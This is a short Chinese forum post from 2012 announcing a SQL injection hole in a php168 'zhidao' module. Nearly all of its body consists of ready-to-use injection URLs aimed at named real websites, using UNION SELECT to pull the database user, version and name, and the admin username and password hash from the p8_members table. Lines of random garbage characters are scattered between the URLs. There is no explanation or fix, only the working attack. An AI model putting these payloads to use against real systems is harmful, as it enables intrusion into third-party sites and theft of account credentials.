找回密码
 立即注册
查看: 3665|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
% p/ j+ J6 C8 f/ Z* J8 y                                                         6 M7 C5 s4 S- ?% Y. f
                                       # j4 r  X5 C8 G+ X2 A; H
7 f0 \6 C2 A" G, z4 S8 D  R. c1 Z
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--; w1 c9 K* v% r# T
                                                     
: S/ C6 m: t4 Z$ h$ l+ U# W                                                                  
1 l( n& S& g* s: h+ s5 N' y7 @                                                        ( G" S2 c4 _: c' x6 D3 |8 g, w: N! J
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--2 H( t  n4 ?% W; l- K1 O" t- f
( ]" \) |$ |- K' x4 ]% _8 v
) ?9 K, [* z1 x8 [+ V
" I% o( Y1 j& ?4 ~* e( K5 e
                                                            
  x  r- r0 @0 ]- {9 b0 |9 C
* y1 U3 F( k" C! O$ Khttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--- a( n6 B) b1 p) y- S. m0 b

" c  T- y/ U0 E' V+ O3 Z+ X! F0 @" |8 v8 B+ r: h% u

: O; T# V2 Y* f& o  ~5 U                                                                    + f2 g+ L" ?# @+ O1 v0 g: A; C

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表